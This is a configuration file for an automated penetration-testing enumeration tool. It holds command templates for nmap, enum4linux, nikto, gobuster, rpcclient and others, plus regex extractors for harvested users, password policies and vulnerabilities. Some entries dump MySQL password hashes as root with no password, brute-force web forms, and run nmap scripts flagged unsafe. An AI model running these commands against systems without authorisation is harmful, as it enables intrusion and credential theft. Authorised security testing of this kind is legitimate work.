config.ini

#= Commands ==============================
# The following INI sections are enumeration commands which have the following dynamic replacement values
# <target>              = IP Address that the command will be run against
# <output>              = Path to the output file specific to this command (also used to detect if a script has already been run)
# <output folder>       = Path to the root output folder (where reports are written to)
# <output nmap>       	= Path to the nmap output file specific to this command
# <host file>           = Path to the host list file specified at the command line (Nmap XML files are stored here and loaded)
# <port>                = Port number of this service
# <service>             = Service name identified by Nmap
# <host ports comma>    = List of all ports on host separated by a comma
# <host ports space>    = List of all ports on host separated by a space
# <nmap dns server>     = Nmap dns server is specified by the -dnsServer argument. Replaced with  --dns-server dnsserver
# <nmap proxy server>   = Nmap proxy server is specified by the -proxy argument. Replaced with  --proxy proxyserver
# <nmap proxy server>        = Nmap dns server is specified by the -proxy argument. Replaced with  proxyserver
#
# Using word lists
# Config section and item parameters can be used in place of config list paths.
# List sections must always contain the word "List"
#  Ex. <best15> - run the command using item best15:path/to/list under the [List Directories] section
# Commands can also be executed against each entry in a list if the section name is referenced
#  Ex. <List Directories> - run a command against all items under the section [List Directories]
# <*list section name*> = Execute the command against all file lists
# <*list item name*>    = Execute the command using a list item under any section
#
# Using findings and findinds lists
# Findings are files containing interesting data extracted as part of the post enumeration processing
# They contain lists of unique usernames, passwords, urls, vulnerabilities and
# can be found in the root of each host folder (Ex. /output/10.10.10.1/users.txt)
# Findings configuration items start with the keyword Findings, followed by the name of the text file
# where the findinds data will be found.
#  Ex. Findings Vulnerabilities: (.*)
#   Will create a file /output folder/ip address/Vulnerabilities.txt
#
# When creating mulitple findings lists per Section, each findings item name must be unique.
# Add a number to the findings list name and it will be removed during the processing
#  Ex. Findings Users1: Username: (.*)
#  Ex. Findings Users2: Login: (.*)
#
# The findings config item can also be used to "announce" critical findings to the user.
# A critical finding is a typically a CVSS Score of 10.0 and can be exploited to immediatly gain a shell or root shell.
# The Findings Announce dynamic replacement value will display a message on the console in bright red.
# Optionally a description of the alert can be added after the Findings Announce item.
# Ex. Findings Announce Trans2open: \[(Samba 2\.2.+)\]
# Displays the following in the output of the Vanquish script:
# [!] 10.11.1.1 Samba 2.2.7a  trans2open
#
# The findings replacement value starts with the word "Findings", followed by a space
# and the name of the findings list (the findings file minus the .txt extension)
#  Ex. <Findings users>
#  Ex. <Findings passwords>
#
# The findings list dynamic replacement value will load the findings file and execute the command once for everyline
# of the findings file. If you have a findings file of valid URLs for a host, you could use a findings list to
# perform further scanning of those urls.
# Ex. <FindingsList httpurls>
# Ex. <FindingsList users>
#
# The findings list can also leverage a regular expression to extract a substring from each line of a findings file
# Ex. <FindingsList users ^Username\:(.+) Password\:>

#
# ls /usr/share/nmap/scripts/* | grep ftp
#= Network Scan Command ====================
# The following commands scan the network for hosts
[Nmap Fast TCP]
Command: nmap -F <nmap dns server> <nmap proxy server> <target> -oN <output>.nmap -oX <output nmap>.xml --host-timeout 20m --script-timeout 20m >> <output>.txt
[Nmap Fast UDP]
Command: nmap -p 123,161,162,137,138 <nmap dns server> <nmap proxy server> <target> -oN <output>.nmap -oX <output nmap>.xml --host-timeout 20m --script-timeout 20m >> <output>.txt
[Nmap Fast TCP with Port and OS Identification]
Command: nmap -sV -sC -O --version-all <nmap dns server> <nmap proxy server> -F <target> -oN <output>.nmap -oX <output nmap>.xml --host-timeout 20m --script-timeout 20m >> <output>.txt
[Nmap Fast UDP with Port Identification]
Command: nmap -sU -p 123,161,162,137,138 -sV <nmap dns server> <nmap proxy server> --version-all <target> -oN <output>.nmap -oX <output nmap>.xml --host-timeout 20m --script-timeout 20m >> <output>.txt
[Nmap All TCP]
Command: nmap -p 1-65535 -sV -sS -T4 <nmap dns server> <nmap proxy server> <target> -oN <output>.nmap -oX <output nmap>.xml --host-timeout 20m --script-timeout 20m >> <output>.txt
[Nmap All UDP]
Command: nmap -A -sU -p- <nmap dns server> <nmap proxy server> <target> -oN <output>.nmap -oX <output nmap>.xml --host-timeout 20m --script-timeout 20m >> <output>.txt
[Nmap All TCP Comprehensive]
Command: nmap -A -sV -p- <nmap dns server> <nmap proxy server> --script "default or (discovery and safe)" <target> -oN <output>.nmap -oX <output nmap>.xml --host-timeout 20m --script-timeout 20m >> <output>.txt
[Nmap All UDP Comprehensive]
Command: nmap -A -sU -sV -p- <nmap dns server> <nmap proxy server> --script "default or (discovery and safe)" <target> -oN <output>.nmap -oX <output nmap>.xml --host-timeout 20m --script-timeout 20m >> <output>.txt
[Nmap All TCP UDP Comprehensive]
Command: nmap -sS -sU -T4 -A -v -PE -PP -PS80,443 -PA3389 -PU40125 -PY -g 53 <nmap dns server> <nmap proxy server> --script "default or (discovery and safe)" <target> -oN <output>.nmap -oX <output nmap>.xml --host-timeout 20m --script-timeout 20m >> <output>.txt

#= Exploit Searching ====================
[SearchSploit JSON]
Command: searchsploit --json --colour <target> >> <output>.json
[SearchSploit Txt]
Command: searchsploit --colour <target> >> <output>.txt
[SearchSploit Nmap]
Command: for f in <output folder>/Nmap/*.xml; do echo "Processing $f file.."; searchsploit --nmap $f --colour >> <output>_results.txt; done; >> <output>.txt
[NMap Vulscan and Version Detection]
Command: nmap  <nmap proxy server> -sV -p- -O --script=vulscan/vulscan.nse -oN <output>.nmap -oX <output>.xml <target> --host-timeout 20m --script-timeout 20m >> <output>.txt
Findings OS: OS details: (.+)\n
#= Fast Enumeration Commands ====================
# The following commands can be quickly run within a few seconds
[DNS Hostname]
Command: nmblookup -A <target> | grep '<00>' | grep -v '<GROUP>' | cut -d' ' -f1 >> <output>.txt
[DNS Zone Transfer]
Command: dig @<target> <domain> -axfr >> <output>.txt
[DNS Nmap Host Names Lookup]
Command: nmap -sP --dns-server <target> <nmap proxy server> -iL <host file> -oX <output folder>/Nmap/hostnames.xml --host-timeout 20m --script-timeout 20m >> <output>.txt
[DHCP Nmap Discover]
Command: nmap -sU -p <port> --script=dhcp-discover <target> <nmap proxy server> -oN <output>.nmap -oX <output>.xml --host-timeout 20m --script-timeout 20m >> <output>.txt
[DHCP Nmap Broadcast Discover]
Command: nmap --script broadcast-dhcp-discover oN <output>.nmap -oX <output>.xml --host-timeout 20m --script-timeout 20m >> <output>.txt
[DHCP Nmap v6 Broadcast Discover]
Command: nmap --script broadcast-dhcp6-discover oN <output>.nmap -oX <output>.xml --host-timeout 20m --script-timeout 20m >> <output>.txt
[SMB Nmap Vuln Scan]
Command: nmap -v --script=smb-vuln* -p <port> <target> <nmap proxy server> -oN <output>.nmap -oX <output>.xml --host-timeout 20m --script-timeout 20m >> <output>.txt
Findings Vulnerabilities: \| [a-zA-Z0-9\-_~]+\:((\s*\|\s+.+$)+\s+\|_\s+.+$)
Findings Announce1: \|\s+(.+\(MS08-067\))
Findings Announce2: \|\s+(.+\(ms17-010\))$
[SMB NBTScan]
Command: nbtscan -r -v -h <target> >> <output>.txt
[SMB Nbtscan-unixwiz]
Command: nbtscan-unixwiz <target> >> <output>.txt
[SMB Enum4linux]
Command: enum4linux -a -M -v <target> >> <output>.txt
Findings Users1: ^S\-.+\s+\w+\\(.+)\s+\(\w+ User\)
Findings Users2: ^user:\[(.+)\] rid:\['
Findings PasswordList1: ^user:\[(.+)\] rid:\['
Findings PasswordList2: ^S\-.+\s+\w+\\(.+)\s+\(\w+ User\)
Findings Services: ^Domain.+Server=\[(.+)\]
Findings Announce Trans2open: Server=\[(Samba 2\.2.+)\]
Findings Domain1: ^\[.+domain/workgroup\sname:\s+(.+)
Findings Domain2: Domain Name: (.+)$
Findings PasswordList3: ^\[.+domain/workgroup\sname:\s+(.+)
Findings PasswordList4: Domain Name: (.+)$
Findings Shares: ^\[V\]\s+Attempting map to share (.+) with command:
Findings Groups1: ^group:\[(.+)\] rid:\[
Findings Groups2: ^S\-.+\s+\w+\\(.+)\s+\(.\w+ Group\)
Findings PasswordList5: ^group:\[(.+)\] rid:\[
Findings PasswordList6: ^S\-.+\s+\w+\\(.+)\s+\(.\w+ Group\)
Findings PasswordPolicy1: ^\[\+\] Password Info for Domain: \w+\n+(\n^(\s.+$\n)+)^\[\w+\]
Findings PasswordPolicy2: \[\+\] Retieved partial password policy with rpcclient:\n(\s+.+\s.+)\s+=
[SMB Nmblookup]
Command: nmblookup -A <target> >> <output>.txt
[SMB Client Connect]
Command: smbclient -L //<target> -N >> <output>.txt
[Samba Nmap Vuln Scan]
Command: nmap -v -p <port> --script="samba*" -d <target> -oN <output>.nmap -oX <output>.xml --host-timeout 20m --script-timeout 20m >> <output>.txt
Findings Announce1: \|\s+(.+\(MS08-067\))
Findings Announce2: \|\s+(.+\(ms17-010\))$
[FTP Nmap Anon]
Command: nmap -v -p <port> --script=ftp-anon --script-args=unsafe=1 <target> <nmap proxy server> -oN <output>.nmap -oX <output>.xml --host-timeout 20m --script-timeout 20m >> <output>.txt
Findings Vulnerabilities: (\|\sftp-anon\:.+$(\s^\|.+$)+\s^\|_.+$)
[FTP Nmap Bounce]
Command: nmap -v -p <port> --script=ftp-bounce --script-args=unsafe=1 <target> <nmap proxy server> -oN <output>.nmap -oX <output>.xml --host-timeout 20m --script-timeout 20m >> <output>.txt
[FTP Nmap Vulnerability Scan]
Command: nmap -v -p <port> --script="ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum,ftp-vuln*" -d <target> -oN <output>.nmap -oX <output>.xml --host-timeout 20m --script-timeout 20m >> <output>.txt
Findings Vulnerabilities: \| [a-zA-Z0-9\-_~]+\:((\s*\|\s+.+$)+\s+\|_\s+.+$)
[MySQL Nmap Empty Password]
Command: nmap -v --script mysql-empty-password -p <port> <target> -d <nmap proxy server> -oN <output>.nmap -oX <output>.xml --host-timeout 20m --script-timeout 20m >> <output>.txt
[MySQL Nmap Info]
Command: nmap -v --script mysql-info -p <port> <target> -d <nmap proxy server> -oN <output>.nmap -oX <output>.xml --host-timeout 20m --script-timeout 20m >> <output>.txt
[MySQL Nmap Vuln Scan]
Command: nmap -v --script mysql-vuln* -p <port> <target> <nmap proxy server> -d -oN <output>.nmap -oX <output>.xml --host-timeout 20m --script-timeout 20m >> <output>.txt
Findings Vulnerabilities: \| [a-zA-Z0-9\-_~]+\:((\s*\|\s+.+$)+\s+\|_\s+.+$)
[SMTP Nmap Vuln Scan]
Command: nmap -v --script smtp-vuln* -p <port> <target> -d <nmap proxy server> -oN <output>.nmap -oX <output>.xml --host-timeout 20m --script-timeout 20m >> <output>.txt
Findings Vulnerabilities: \| [a-zA-Z0-9\-_~]+\:((\s*\|\s+.+$)+\s+\|_\s+.+$)
[SMTP Nmap Commands]
Command: nmap -v --script smtp-commands -p <port> <target> <nmap proxy server> -d -oN <output>.nmap -oX <output>.xml --host-timeout 20m --script-timeout 20m >> <output>.txt
[SMTP Nmap NTLM Info]
Command: nmap -v --script smtp-ntlm-info -p <port> <target> <nmap proxy server> -d -oN <output>.nmap -oX <output>.xml --host-timeout 20m --script-timeout 20m >> <output>.txt
[SMTP Nmap Open Relay]
Command: nmap -v --script=smtp-open-relay -p <port> <target> <nmap proxy server> -d -oN <output>.nmap -oX <output>.xml --host-timeout 20m --script-timeout 20m >> <output>.txt
[NMap SSL Heartbleed]
Command: nmap -v -p <port> --script=ssl-heartbleed <target> <nmap proxy server> -d -oN <output>.nmap -oX <output>.xml --host-timeout 20m --script-timeout 20m >> <output>.txt
[NMap Http Shell Shock]
Command: nmap -v -p <port> --script=http-shellshock <target> <nmap proxy server> -d -oN <output>.nmap -oX <output>.xml --host-timeout 20m --script-timeout 20m >> <output>.txt
[SNMP Nmap All]
Command: nmap --script=snmp* -p <port> <target> -d -oN <output>.nmap <nmap proxy server> -oX <output>.xml --host-timeout 20m --script-timeout 20m >> <output>.txt
[SNMP Onesixtyone]
Command: onesixtyone <target> >> <output>.txt
[SNMP SNMPWalk]
Command: snmpwalk -c public -r 2 -t 10 -L o <target> >> <output>.txt
[SNMP SNMP-Check]
Command: snmp-check <target> >> <output>.txt
[SSLScan]
Command: sslscan <target>:<port> >> <output>.txt
[SSLyze]
Command: sslyze --resum --certinfo=basic --compression --reneg --sslv2 --sslv3 --hide_rejected_ciphers <target>:<port> >> <output>.txt
[SSH Nmap Enum]
Command: nmap -v -sV -p <port> --script="ssh*" <target> -d <nmap proxy server> -oN <output>.nmap -oX <output>.xml --host-timeout 20m --script-timeout 20m >> <output>.txt
[SSH Nmap Hostkey]
Command: nmap <target> -p <port> -sV --script="ssh-hostkey,ssh-auth-methods" --script-args ssh_hostkey=full -oN <output>.nmap -oX <output>.xml --host-timeout 20m --script-timeout 20m >> <output>.txt
Findings Services: open\s+ssh\s+(.+)
Findings Sshhostkeys: \|_*\s+\d+\s+(([a-f0-9][a-f0-9]\:)+[a-f0-9][a-f0-9])
[Nmap Web Scan]
Command: nmap -v -p <port> --script='(http* or ssl*) and not (broadcast or dos or external or http-slowloris* or fuzzer)' -oN <output>.nmap -oX <output>.xml <target> --host-timeout 20m --script-timeout 20m >> <output>.txt
[Nmap Rlogin]
Command: nmap -v -p <port> --script=rlogin* <target> <nmap proxy server> -oN <output>.nmap -oX <output>.xml --host-timeout 20m --script-timeout 20m >> <output>.txt
[Nmap Rexec]
Command: nmap -v -p <port> --script=rexec* <target> <nmap proxy server> -oN <output>.nmap -oX <output>.xml --host-timeout 20m --script-timeout 20m >> <output>.txt
[MySql Dump Tables]
Command: mysql -u root -h <target> -e 'SHOW DATABASES; SELECT Host,User,Password FROM mysql.user;' --host-timeout 20m --script-timeout 20m >> <output>.txt
[VNC NMap Scan]
Command: nmap -v --script=vnc* -p <port> <target> <nmap proxy server> -oN <output>.nmap -oX <output>.xml --host-timeout 20m --script-timeout 20m >> <output>.txt
[Telnet NMap All]
Command: nmap -v --script=telnet* -p <port> <target> <nmap proxy server> -oN <output>.nmap -oX <output>.xml --host-timeout 20m --script-timeout 20m >> <output>.txt
[Telnet Cisco Torch]
Command: cisco-torch -A <target> >> <output>.txt
[Finger Nmap All]
Command: nmap -v --script=finger* -p <port> <target> <nmap proxy server> -oN <output>.nmap -oX <output>.xml --host-timeout 20m --script-timeout 20m >> <output>.txt
[Msrpc Nmap Enum]
Command: nmap -v -p <port> --script=msrpc-enum <target> -d <nmap proxy server> -oN <output>.nmap -oX <output>.xml --host-timeout 20m --script-timeout 20m >> <output>.txt
[Msrpc Enum4linux]
Command: enum4linux -a -M -v <target> >> <output>.txt
Findings Users1: ^S\-.+\s+\w+\\(.+)\s+\(\w+ User\)
Findings Users2: ^user:\[(.+)\] rid:\['
Findings PasswordList1: ^user:\[(.+)\] rid:\['
Findings PasswordList2: ^S\-.+\s+\w+\\(.+)\s+\(\w+ User\)
Findings Services: ^Domain.+Server=\[(.+)\]
Findings Announce Trans2open: Server=\[(Samba 2\.2.+)\]
Findings Domain1: ^\[.+domain/workgroup\sname:\s+(.+)
Findings Domain2: Domain Name: (.+)$
Findings PasswordList3: ^\[.+domain/workgroup\sname:\s+(.+)
Findings PasswordList4: Domain Name: (.+)$
Findings Shares: ^\[V\]\s+Attempting map to share (.+) with command:
Findings Groups1: ^group:\[(.+)\] rid:\[
Findings Groups2: ^S\-.+\s+\w+\\(.+)\s+\(.\w+ Group\)
Findings PasswordList5: ^group:\[(.+)\] rid:\[
Findings PasswordList6: ^S\-.+\s+\w+\\(.+)\s+\(.\w+ Group\)
Findings PasswordPolicy1: ^\[\+\] Password Info for Domain: \w+\n+(\n^(\s.+$\n)+)^\[\w+\]
Findings PasswordPolicy2: \[\+\] Retieved partial password policy with rpcclient:\n(\s+.+\s.+)\s+=
[RDP Nmap Enum Encryption]
Command: nmap -v -p <port> --script=rdp-enum-encryption <target> <nmap proxy server> -d -oN <output>.nmap -oX <output>.xml --host-timeout 20m --script-timeout 20m >> <output>.txt
[RDP Nmap Vuln Scan]
Command: nmap -v -p <port> --script=rdp-vuln* <target> <nmap proxy server> -d -oN <output>.nmap -oX <output>.xml --host-timeout 20m --script-timeout 20m >> <output>.txt
Findings Vulnerabilities: \| [a-zA-Z0-9\-_~]+\:((\s*\|\s+.+$)+\s+\|_\s+.+$)
[RPC RPCClient Help]
Command: rpcclient -U "" -N <target> -chelp >> <output>.txt
[RPC RPCClient Enumprivs]
Command: rpcclient -U "" -N <target> -cenumprivs >> <output>.txt
[RPC RPCClient Netshareenum]
Command: rpcclient -U "" -N <target> -cnetshareenum >> <output>.txt
[RPC RPCClient Srvinfo]
Command: rpcclient -U "" -N <target> -csrvinfo >> <output>.txt
[RPC RPCClient Lookupnames Root]
Command: rpcclient -U "" -N <target> -c"lookupnames root" >> <output>.txt
[RPC Nmap RPC Info]
Command: nmap -v -p <port> --script=rpcinfo <target> <nmap proxy server> -d -oN <output>.nmap -oX <output>.xml --host-timeout 20m --script-timeout 20m >> <output>.txt
[Kerberos]
Command: searchsploit --colour MS14-068 >> <output>.txt
[NFS List Shares]
Command: showmount -e <target> >> <output>.txt
[NFS NMAP Showmount]
Command: nmap -sV --script=nfs-showmount <target> <nmap proxy server> --host-timeout 20m --script-timeout 20m >> <output>.txt
[James-Admin]
Command: searchsploit --colour "apache james" >> <output>.txt
[NTP NTPQ Version]
Command: ntpq -c version <target> >> <output>.txt
[NTP NTPQ Readlist]
Command: ntpq -c readlist <target> >> <output>.txt
[NTP NTPQ Hostnames]
Command: ntpq -c hostnames <target> >> <output>.txt
[NTP Nmap All]
Command: nmap -sU -p <port> --script=ntp* <target> <nmap proxy server> --host-timeout 20m --script-timeout 20m >> <output>.txt
[TFTP Nmap Enum]
Command: nmap -v -p <port> --script=tftp-enum <target> <nmap proxy server> -d -oN <output>.nmap -oX <output>.xml --host-timeout 20m --script-timeout 20m >> <output>.txt
[POP3 Nmap Enum]
Command: nmap -v -sV -p <port> --script="pop3-capabilities or pop3-ntlm-info" <target> <nmap proxy server> -d -oN <output>.nmap -oX <output>.xml --host-timeout 20m --script-timeout 20m >> <output>.txt
[IMAP Nmap Enum]
Command: nmap -v -sV -p <port> --script="imap-capabilities or imap-ntlm-info" <target> <nmap proxy server> -d -oN <output>.nmap -oX <output>.xml --host-timeout 20m --script-timeout 20m >> <output>.txt
[Nmap Vulnerability Scan All Host Ports]
Command: nmap -v -p <host ports comma>  -d --script=*vuln* --script-args=unsafe=1 <target> <nmap proxy server> -d -oN <output>.nmap -oX <output>.xml --host-timeout 20m --script-timeout 20m >> <output>.txt
Findings Vulnerabilities: \| [a-zA-Z0-9\-_~]+\:((\s*\|\s+.+$)+\s+\|_\s+.+$)
[HTTP Nmap SQL Injection Scan]
Command: nmap -sV -p <port> --script=http-sql-injection --script-args=unsafe=1 <target> <nmap proxy server> -oN <output>.nmap -oX <output>.xml --host-timeout 20m --script-timeout 20m >> <output>.txt
Findings SqlInjection: \| (http-sql-injection:(\s*\|\s+.+$)+\s+\|_\s+.+$)
[HTTP Nmap SQL Injection Findings List Scan]
Command: nmap -sV -p <port> --script=http-sql-injection --script-args=http-sql-injection.url=<FindingsList urlshttprelative> <target> <nmap proxy server> -oN <output>.nmap -oX <output>.xml --host-timeout 20m --script-timeout 20m >> <output>.txt
Findings SqlInjection: \| (http-sql-injection:(\s*\|\s+.+$)+\s+\|_\s+.+$)
[HTTPS Nmap SQL Injection Findings List Scan]
Command: nmap -sV -p <port> --script=http-sql-injection --script-args=http-sql-injection.url=<FindingsList urlshttpsrelative> <target> <nmap proxy server> -oN <output>.nmap -oX <output>.xml --host-timeout 20m --script-timeout 20m >> <output>.txt
Findings SqlInjection: \| (http-sql-injection:(\s*\|\s+.+$)+\s+\|_\s+.+$)
[HTTP Nmap Form Brute Findings List]
Command: nmap -sV -p <port> --script=http-form-brute --script-args=http-form-brute.path=<FindingsList urlshttprelative> <target> <nmap proxy server> -oN <output>.nmap -oX <output>.xml --host-timeout 20m --script-timeout 20m >> <output>.txt
Findings HttpFormBrute: \| (http-form-brute:(\s*\|\s+.+$)+\s+\|_\s+.+$)
[HTTPS Nmap Form Brute Findings List]
Command: nmap -sV -p <port> --script=http-form-brute --script-args=http-form-brute.path=<FindingsList urlshttpsrelative> <target> <nmap proxy server> -oN <output>.nmap -oX <output>.xml --host-timeout 20m --script-timeout 20m >> <output>.txt
Findings HttpsFormBrute: \| (http-form-brute:(\s*\|\s+.+$)+\s+\|_\s+.+$)
[HTTP Nmap Form Fuzzer]
Command: nmap -sV -p <port> --script=http-form-fuzzer <target> -oN <output>.nmap -oX <output>.xml >> <output>.txt
Findings HttpFormFuzzer: \| (http-form-fuzzer:(\s*\|\s+.+$)+\s+\|_\s+.+$)
[HTTP Nmap Form Fuzzer Findings List]
Command: nmap -sV -p <port> --script=http-form-fuzzer --script-args=http-form-fuzzer.targets={{path="<FindingsList urlshttprelative>"}} <target> <nmap proxy server> -oN <output>.nmap -oX <output>.xml --host-timeout 20m --script-timeout 20m >> <output>.txt
Findings HttpFormFuzzer: \| (http-form-fuzzer:(\s*\|\s+.+$)+\s+\|_\s+.+$)
[HTTPS Nmap Form Fuzzer Findings List]
Command: nmap -sV -p <port> --script=http-form-fuzzer --script-args=http-form-fuzzer.targets={{path="<FindingsList urlshttpsrelative>"}} <target> <nmap proxy server> -oN <output>.nmap -oX <output>.xml --host-timeout 20m --script-timeout 20m >> <output>.txt
Findings HttpFormFuzzer: \| (http-form-fuzzer:(\s*\|\s+.+$)+\s+\|_\s+.+$)
[XProbe2 OS Enumeration]
Command: xprobe2 <target> >> <output>.txt
[MS-SQL-S Nmap MS-SQL Info]
Command: nmap -p <port> --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes  --script-args mssql.instance-port=<port>,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER <target> <nmap proxy server> -oN <output>.nmap -oX <output>.xml --host-timeout 20m --script-timeout 20m >> <output>.txt
#= Slow Enumeration Commands ====================
# The following commands can take up to 20 minutes to run
[DNS Recon]
Command: dnsrecon -d <target>  -D /usr/share/wordlists/dnsmap.txt -t std --xml <output>.xml >> <output>.txt
[DNS Nmap All]
Command: nmap -A -sU -sV -Pn -T5 --script=dns* -p U:53,T:53 <target> <nmap proxy server> -oN <output>.nmap -oX <output>.xml --host-timeout 20m --script-timeout 20m >> <output>.txt
[FTP Nmap All]
Command: nmap -v -p <port> --script="ftp-*" --script-args=unsafe=1 <target> <nmap proxy server> -oN <output>.nmap -oX <output>.xml --host-timeout 20m --script-timeout 20m >> <output>.txt
[SMB Nmap All]
Command: nmap -sV -Pn -vv -p <port> --script='(smb*) and not (brute or broadcast or dos or external or fuzzer)' --script-args=unsafe=1 <nmap proxy server> -oN <output>.nmap -oX <output>.xml <target> --host-timeout 20m --script-timeout 20m >> <output>.txt
Findings OS: ^\|\s+OS:\s(.+)$
Findings ComputerName: ^\|\s+NetBIOS computer name:\s(.+)$
Findings Domain: ^\|\s+Domain:\s(.+)$
Findings Files: ^\|\ssmb-ls\:(.+\s+(^\|\s+.+\s)+)
[MS-SQL Nmap All]
Command: nmap -v -p <port> --script=ms-sql-* --script-args=unsafe=1 <target> <nmap proxy server> -oN <output>.nmap -oX <output>.xml --host-timeout 20m --script-timeout 20m >> <output>.txt
Findings Vulnerabilities: \| [a-zA-Z0-9\-_~]+\:((\s*\|\s+.+$)+\s+\|_\s+.+$)
[MySQL Nmap All]
Command: nmap -v -p <port> --script=mysql-* --script-args=unsafe=1 <target> <nmap proxy server> -oN <output>.nmap -oX <output>.xml --host-timeout 20m --script-timeout 20m >> <output>.txt
Findings Vulnerabilities: \| [a-zA-Z0-9\-_~]+\:((\s*\|\s+.+$)+\s+\|_\s+.+$)
[SNMP Nmap All]
Command: nmap -sV -Pn -vv -p <port> --script=snmp* <nmap proxy server> -oN <output>.nmap -oX <output>.xml <target> --host-timeout 20m --script-timeout 20m >> <output>.txt
Findings Vulnerabilities: \| [a-zA-Z0-9\-_~]+\:((\s*\|\s+.+$)+\s+\|_\s+.+$)
[HTTP Nikto Fast]
Command: nikto -nointeractive -maxtime 30m -timeout 60 -Plugins 'paths;outdated;report_sqlg;auth;content_search;report_text;fileops;parked;shellshock;report_html;cgi;headers;report_nbe;favicon;cookies;robots;report_xml;report_csv;ms10_070;msgs;drupal;apache_expect_xss;siebel;put_del_test;apacheusers;dictionary;embedded;ssl;clientaccesspolicy;httpoptions;subdomain;negotiate;sitefiles;mutiple_index' -C all -host http://<target>:<port>/ -port <port> >> <output>.txt
Findings Vulnerabilities1: \+ (\/.+)
Findings Vulnerabilities2: \+ (Allowed HTTP Methods\:.+)
Findings Vulnerabilities3: \+\s(.+\: \/.+\: Site appears.+\.)
Findings Vulnerabilities4: \+ (\"robots.+\.)
Findings Vulnerabilities5: \+ (OSVDB.+)
Findings Vulnerabilities6: \+ (.+appears to be outdated.+\.)
Findings Vulnerabilities7: \+ (WebDAV.+)
Findings Vulnerabilities8: \+ (MiniServ.+)
Findings Vulnerabilities9: \+ (Entry.+)
Findings Services: \+ Server\: (.+)\s+\+
Findings Announce: \+.+\: .+\'(shellshock)\'.+
[HTTPS Nikto Fast]
Command: nikto -nointeractive -maxtime 30m -timeout 60 -Plugins 'paths;outdated;report_sqlg;auth;content_search;report_text;fileops;parked;shellshock;report_html;cgi;headers;report_nbe;favicon;cookies;robots;report_xml;report_csv;ms10_070;msgs;drupal;apache_expect_xss;siebel;put_del_test;apacheusers;dictionary;embedded;ssl;clientaccesspolicy;httpoptions;subdomain;negotiate;sitefiles;mutiple_index' -C all -host https://<target>:<port>/ -port <port> >> <output>.txt
Findings Vulnerabilities1: \+ (\/.+)
Findings Vulnerabilities2: \+ (Allowed HTTP Methods\:.+)
Findings Vulnerabilities3: \+\s(.+\: \/.+\: Site appears.+\.)
Findings Vulnerabilities4: \+ (\"robots.+\.)
Findings Vulnerabilities5: \+ (OSVDB.+)
Findings Vulnerabilities6: \+ (.+appears to be outdated.+\.)
Findings Vulnerabilities7: \+ (WebDAV.+)
Findings Vulnerabilities8: \+ (MiniServ.+)
Findings Vulnerabilities9: \+ (Entry.+)
Findings Services: \+ Server\: (.+)\s+\+
Findings Announce: \+.+\: .+\'(shellshock)\'.+
[HTTP Nikto Tests]
Command: nikto -nointeractive -maxtime 90m -timeout 60 -Plugins 'tests' -C all -host http://<target>:<port>/ -port <port> >> <output>.txt
Findings Vulnerabilities1: \+ (\/.+)
Findings Vulnerabilities2: \+ (Allowed HTTP Methods\:.+)
Findings Vulnerabilities3: \+\s(.+\: \/.+\: Site appears.+\.)
Findings Vulnerabilities4: \+ (\"robots.+\.)
Findings Vulnerabilities5: \+ (OSVDB.+)
Findings Vulnerabilities6: \+ (.+appears to be outdated.+\.)
Findings Vulnerabilities7: \+ (WebDAV.+)
Findings Vulnerabilities8: \+ (MiniServ.+)
Findings Vulnerabilities9: \+ (Entry.+)
Findings Services: \+ Server\: (.+)\s+\+
Findings Announce: \+.+\: .+\'(shellshock)\'.+
[HTTPS Nikto Tests]
Command: nikto -nointeractive -maxtime 90m -timeout 60 -Plugins 'tests' -C all -host https://<target>:<port>/ -port <port> >> <output>.txt
Findings Vulnerabilities1: \+ (\/.+)
Findings Vulnerabilities2: \+ (Allowed HTTP Methods\:.+)
Findings Vulnerabilities3: \+\s(.+\: \/.+\: Site appears.+\.)
Findings Vulnerabilities4: \+ (\"robots.+\.)
Findings Vulnerabilities5: \+ (OSVDB.+)
Findings Vulnerabilities6: \+ (.+appears to be outdated.+\.)
Findings Vulnerabilities7: \+ (WebDAV.+)
Findings Vulnerabilities8: \+ (MiniServ.+)
Findings Vulnerabilities9: \+ (Entry.+)
Findings Services: \+ Server\: (.+)\s+\+
Findings Announce: \+.+\: .+\'(shellshock)\'.+
[HTTP Dirb]
Command: dirb http://<target>:<port>/ -S -w  >> <output>.txt
[HTTPS Dirb]
Command: dirb https://<target>:<port>/ -S -w  >> <output>.txt
[HTTP GoBuster]
Command: gobuster -e -r -t 5 -U username -P password -s '200,204,500,403,301,302,308,307' -w <common> -u http://<target>:<port>/ >> <output>.txt
Findings UrlsHttp: (^http.+)\s+\(
Findings UrlsHttpRelative: ^http:\/\/[a-zA-Z0-9.:-_]+(\/.+)\s+\(
[HTTPS GoBuster]
Command: gobuster -e -r -t 5 -U username -P password -s '200,204,500' -w <common> -u https://<target>:<port>/ >> <output>.txt
Findings UrlsHttps: (^http.+)\s+\(
Findings UrlsHttpsRelative: ^https:\/\/[a-zA-Z0-9.:-_]+(\/.+)\s+\(
[HTTP GoBuster All Dicts]
Command: gobuster -e -r -t 5 -U username -P password -s '200,204,500' -u http://<target>:<port>/ -w <big> >> <output>.txt
Findings UrlsHttp: (^http.+)\s+\(
Findings UrlsHttpRelative: ^http:\/\/[a-zA-Z0-9.:-_]+(\/.+)\s+\(
[HTTPS GoBuster All Dicts]
Command: gobuster -e -r -t 5 -U username -P password -s '200,204,500' -u https://<target>:<port>/ -w <big> >> <output>.txt
Findings UrlsHttps: (^http.+)\s+\(
Findings UrlsHttpsRelative: ^https:\/\/[a-zA-Z0-9.:-_]+(\/.+)\s+\(
[HTTP GoBuster Findings All Dicts]
Command: gobuster -e -r -t 5 -U username -P password -s '200,204,500' -u <FindingsList urlshttp> -w <common> >> <output>.txt
Findings UrlsHttp: (^http.+)\s+\(
Findings UrlsHttpRelative: ^http:\/\/[a-zA-Z0-9.:-_]+(\/.+)\s+\(
[HTTPS GoBuster Findings All Dicts]
Command: gobuster -e -r -t 5 -U username -P password -s '200,204,500' -u <FindingsList urlshttps> -w <common> >> <output>.txt
Findings UrlsHttps: (^http.+)\s+\(
Findings UrlsHttpsRelative: ^https:\/\/[a-zA-Z0-9.:-_]+(\/.+)\s+\(
[HTTP Web Application Firewall]
Command: wafw00f http://<target>:<port> >> <output>.txt
[HTTPS Web Application Firewall]
Command: wafw00f https://<target>:<port> >> <output>.txt
